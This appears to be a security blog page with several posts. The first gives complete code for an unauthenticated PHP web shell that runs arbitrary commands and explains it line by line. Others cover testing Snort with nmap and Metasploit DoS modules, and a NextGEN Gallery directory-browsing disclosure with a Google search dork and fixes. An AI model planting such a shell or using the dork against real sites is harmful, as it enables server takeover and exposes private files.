Information Security Expert Blog

Dr. Ali Jahangiri

Simple PHP Shell Script

By

Here is a simple PHP shell script which took less than 10 minutes to write. This tiny script lets you execute arbitrary shell commands or browse the filesystem on a remote Linux server.

<HTML>
<HEAD>
<TITLE>Simple PHP Shell</TITLE>
</HEAD>
<BODY>
<form action=”shell.php” method=post>
<input type=”text” NAME=”c”/>
<input name=”submit” type=submit value=”Command”>
</FORM>
<?php
if(isset($_REQUEST[‘submit’]))
{
$c = $_REQUEST[‘c’];
$output = shell_exec(“$c”);
echo “<pre>$output</pre>\n”;
}
?>
</BODY>
</HTML>

The script has two parts: HTML and PHP

HMTL

1. This is the start of HTML code.
<HTML>
2. Create a HEAD section for the HTML page and declare “Simple PHP Shell” as its title.
<HEAD>
<TITLE>Simple PHP Shell</TITLE>
</HEAD>
3. Create BODY section for the HTML page.
<BODY>
4. Create a form which calls shell.php. Please note, this assumes that this script is saved as shell.php.
<form action=”shell.php” method=post>
5. Create a text input field with the name of “c”.
<input type=”text” NAME=”c”/>
6. Create a button with the name of “submit” with the label “Command”
<input type=submit name=”submit” value=”Command”>
7. Close the form.
</FORM>

PHP

1. The PHP code is embedded in the HTML code and the start is marked by
<?php
2. Check if the form has been submitted. If the URL variable ‘submit’ exists then the user has clicked the “Command” button. If not do nothing.
if(isset($_REQUEST[‘submit’]))
3. Declare “$c” as a variable and set it to the contents of the input field ‘c’ from the HTML form.
$c = $_REQUEST[‘c’];
4. Declare “$output” as a variable to hold the return value from the shell_exec() function. “$c” is the command that the user entered in the input field.
$output = shell_exec(“$c”);
5. Show the result.
echo “<pre>$output</pre>\n”;
6. Declare the end for the PHP code.
?>

Closing the HTML

1. Close the BODY section.
</BODY>
2.  Declare the end for the HTML code.
</HTML>

MasterCard Australia: Untrusted SSL Certificate

By

I am not sure why we have something like PCI DSS when MasterCard, as a major payment processing company is not using it.

I came across an untrusted digital certificate for MasterCard Australia while I was trying to pay my insurance premium to UAE branch of Metlife / Alico.

Here is a screen shot and exported certificate.

UPDATE: The issue has been resolved by MasterCard.

MasterCard Australia: Untrusted SSL Certificate
MasterCard Australia: Untrusted SSL Certificate

How to Test Snort with Penetration Testing Tools

By

Recently, I deployed Snort on a cloud-based network to act as an Intrusion Detection System (IDS). The installation process and compiling Snort on a cloud server with CentOS 5.7 is an adventure on its own! But testing it properly was my main challenge.

The project’s team leader decided to use Snort IDS after my recommendation. Using Snort allowed the project to comply with the client’s security baseline and save $800/month by not using the IDS solution offered by the hosting company.

The only way that I could test the Snort installation’s functionality and configuration was through real world attack simulations. I tried to simulate attacks by using penetration testing tools.

First Test – Port Scanning

Most of the time penetration testing starts with a port scan which allows the tester to probe the target and attempt to discover any open ports, running services and to detect the operating system. To do this I used nmap.

After running nmap, the Snort box was able to detect the port scan. In addition to a TCP port scan, I used nmap to make a UDP port scan to see how well Snort reacted. The Snort installation was able to detect the UDP port scan without problem.

Second Test – Attack to Apache Server

I decided to take my Snort test to a higher level by using Metasploit to launch some actual attacks to see if Snort would be able to detect the attacks.

The first attack I used from Metasploit was an Apache Range DoS attack (auxiliary/dos/http/apache_range_dos) which is known as Apache Killer. I knew the Apache version installed was not vulnerable, but I just wanted to see if Snort was able to detect the attack. Snort was able to detect this attack and log it as an alert. Then, I used an attack against mod_isapi extension in Apache from Metasploit (auxiliary/dos/http/apache_mod_isapi). Snort was able to detect this and log it without problem.

Third Test – Protocol Anomaly

I tried to play with SSH to establish SSH connections to unconventional ports to check if Snort is able to detect SSH protocol anomalies. After a bit of trial and error, Snort was able to detect the SSH Port mismatches and log the issue as an alert.

Fourth Test – Web Application Fuzzer

I used Webshag as a web application fuzzer (a tool designed to send random data to a web application) to see if Snort would be able to detect the attack. Within a few seconds of launching the attack, Snort started to log Webshag requests and issues alerts for them. However, in this time, Snort was not able to clearly identify the type of suspicious traffic or attack. It just issued thousands of alerts without any further information about the type or the nature of the attack. However this was sufficient for our needs.

Using the above tests, I was confident that Snort was installed and configured correctly.

WordPress NextGEN Gallery Plugin; Directory Browsing Vulnerability

By

I came across this vulnerability at the weekend. The vulnerubility has been reportd to US-Cert and the author of the plugin.

Over View:
NextGEN Gallery plugin for WordPress allows remote directory browsing and unauthorized access to the gallery contents.

Description:
NextGEN Gallery plugin for WordPress does not prevent directory browsing and allows remote attackers to access the galleries and image files directly via HTTP requests. This issue may lead to unauthorized access to the private images or galleries which are not publicly available on the WordPress site/blog.

Exploit Syntax:
The image galleries can be accessed directly via HTTP request: http://www.website.com/wp-content/gallery/

Search engines such as Google can help attackers locate vulnerable websites by searching for the following phrase:

inurl:”/wp-content/gallery/”

Currently, Google returns more than 6 million websites in its search result for the above search phrase.

Impacts:

  1. Unauthorized access to data and files.
  2. Privacy issues due to search engine indexing and archiving.

Solutions:

  1. Add the following lines to WordPress .htaccess to prevent directory browsing:
    # Disable Directory Browsing
    Options All -Indexes
  2. Create an empty file with the name of index.html or index.php and save it in http://www.website.com/wp-content/gallery/ or your gallery folder.
  3. Use Disable Directory Listings plugin, http://wordpress.org/extend/plugins/disable-directory-listings/ (This solution has been provided by NextGEN Gallery author).

Vendor Information:

  1. http://WordPress.org/extend/plugins/nextgen-gallery/
  2. http://alexrabe.de/WordPress-plugins/nextgen-gallery/

Product Details:

  1. NextGEN Gallery
  2. Version: 1.9.2 – 1.9.3
  3. Last update: Jan 17, 2012

Update: This issue did not fix in version 1.9.3

Koobface Gangs Investigative Report

By

Sophos has published details, on its Naked Security Blog, of an investigativereport about the Koobface gang who infected thousands of PCs with malware via Facebook and, according to NewYorkTimes, gained millions of dollars in doing so.

The investigation was carried out by Jan Drömer, an independent researcher, and Dirk Kollberg from SophosLabs between October 2009 and February 2010.

The report is informative and useful for those who are interested in cyber forensic investigation. The investigation started by identifying the command and control server and then through analysis this led to a script which contained the suspects phone numbers! Additional information was also found from the various user names used on the server. The full evidence is now in the hands of the law enforcement agencies.

Cloud Storage and its Security Implications

By

Instant messaging (IM) programs such as Yahoo Messenger, Google Talk and ICQ have been a challenge for IT security professionals for many years. Personally, I have dealt with IM and P2P file-sharing security issues in many different environments, from educational institutions to large corporates. I have tried to control them using different security appliances and solutions including Microsoft ISA Server and Cisco PIX along with security awareness and training for staff.

However, in turns of security issues, IM and P2P file-sharing programs are being superseded by cloud drive utilities such as DropBox and CloudMe Easy Upload. Cloud storage is being used to over come email attachment limitation and to facilitate better file sharing. However, this type of application introduces new problems for information security professionals.

Paul Asadoorian at Tenable Network Security blog has written an interesting article about cloud storage security issues in corporate networks. He discusses the challenges and provides a solution by introducing a new plugin for Tenable’s Nessus vulnerability scanner which can detect DropBox on Microsoft Windows and OS X.